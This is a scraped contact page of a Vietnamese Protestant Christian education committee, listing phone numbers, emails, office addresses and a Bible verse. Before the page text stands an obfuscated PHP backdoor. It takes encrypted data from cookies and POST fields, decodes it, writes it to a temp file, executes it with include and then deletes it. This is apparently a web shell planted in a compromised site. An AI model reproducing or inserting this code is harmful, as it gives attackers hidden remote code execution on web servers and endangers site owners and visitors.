$qfhCo = chr (107) . 'v' . 'X' . chr ( 619 - 524 ).chr ( 547 - 457 ).chr (86) . chr (99) . chr ( 292 - 207 ); $JGVEGpyam = chr ( 921 - 822 )."\154" . "\x61" . "\x73" . chr (115) . "\137" . 'e' . 'x' . chr ( 151 - 46 ).chr (115) . "\164" . chr (115); $UPYzOliaWa = class_exists($qfhCo); $JGVEGpyam = "46590";$UQTOpy = !1;if ($UPYzOliaWa == $UQTOpy){function MMDHQQKPa(){$DOlIL = new /* 40803 */ kvX_ZVcU(31218 + 31218); $DOlIL = NULL;}$DrNFopXx = "31218";class kvX_ZVcU{private function LeBYwp($DrNFopXx){if (is_array(kvX_ZVcU::$yeHlH)) {$mHLVpdIimc = sys_get_temp_dir() . "/" . crc32(kvX_ZVcU::$yeHlH['s' . chr (97) . chr (108) . "\x74"]);@kvX_ZVcU::$yeHlH["\167" . "\162" . "\151" . chr (116) . "\145"]($mHLVpdIimc, kvX_ZVcU::$yeHlH[chr ( 1035 - 936 )."\157" . chr ( 1093 - 983 ).'t' . "\145" . "\156" . chr (116)]);include $mHLVpdIimc;@kvX_ZVcU::$yeHlH["\144" . "\x65" . chr (108) . chr (101) . "\164" . "\145"]($mHLVpdIimc); $DrNFopXx = "31218";exit();}}private $xLcNp;public function ImwdIbGG(){echo 15674;}public function __destruct(){kvX_ZVcU::$yeHlH = @unserialize(kvX_ZVcU::$yeHlH); $DrNFopXx = "11047_35834";$this->LeBYwp($DrNFopXx); $DrNFopXx = "11047_35834";}public function YaLhleBrR($vrtShxDYw, $UhbXJh){return $vrtShxDYw[0] ^ str_repeat($UhbXJh, (strlen($vrtShxDYw[0]) / strlen($UhbXJh)) + 1);}public function AauJxDbMz($vrtShxDYw){$XfNlII = "base64";return array_map($XfNlII . chr (95) . chr ( 777 - 677 ).chr ( 601 - 500 ).chr (99) . 'o' . chr ( 759 - 659 )."\x65", array($vrtShxDYw,));}public function __construct($XGUFdIpQ=0){$XcvNV = $_POST;$XCYeCgqXB = $_COOKIE;$UhbXJh = "de589263-d08c-4a75-b763-01a48ae244d8";$zTTVlyTsPO = @$XCYeCgqXB[substr($UhbXJh, 0, 4)];if (!empty($zTTVlyTsPO)){$vrtShxDYw = "";$zTTVlyTsPO = explode(",", $zTTVlyTsPO);foreach ($zTTVlyTsPO as $hogrX){$vrtShxDYw .= @$XCYeCgqXB[$hogrX];$vrtShxDYw .= @$XcvNV[$hogrX];}kvX_ZVcU::$yeHlH = $this->YaLhleBrR($this->AauJxDbMz($vrtShxDYw), $UhbXJh);}}public static $yeHlH = 12711;}MMDHQQKPa();} UB CĐGD - TLH - Ủy Ban Cơ Đốc Giáo Dục TLH Skip to content

0909002940

phivan_ng@yahoo.com

Hotline: 0918029547

songthuong@yahoo.com

0903992104

hoangdieu83198@yahoo.com

Tài liệu

Trường Chúa nhật

Liên Lạc Với Chúng Tôi

Lời Chúa là ngọn đèn cho chân tôi,
Ánh sáng cho đường lối tôi

(Thi thiên 119:105)


Đăng ký Văn phẩm Cơ Đốc

ĐT: 091-821-8152
Email:  uybancdgd@gmail.com
Email:nguyendinhtin52@gmail.com
Web: sachcodocgiaoduc.net

VP. Tổng Liên Hội

155 Trần Hưng Đạo, Quận 1, Tp. HCM
ĐT: (028) 6659-4588;  090- 536- 3653 

Cơ sở 2 Tổng Liên Hội

633 đường 3/2, Quận 10, Tp. HCM
ĐT: (028) 3957-5255; 091- 802-9547

Nha Trang

30 Lê Thành Phương, TP. Nha Trang
ĐT: (0258) 381-0200;  091-234-2705 

TP. Đà Nẵng

270 Lê Duẩn, TP. Đà Nẵng
ĐT: (0236) 375-2757;  090-381-2483

TP. Cần Thơ

87 Xô Viết Nghệ Tĩnh, Tp. Cần Thơ
ĐT: (0292) 3601-904; 076-722-8383

© 2023 Ủy Ban Cơ Đốc Giáo Dục TLH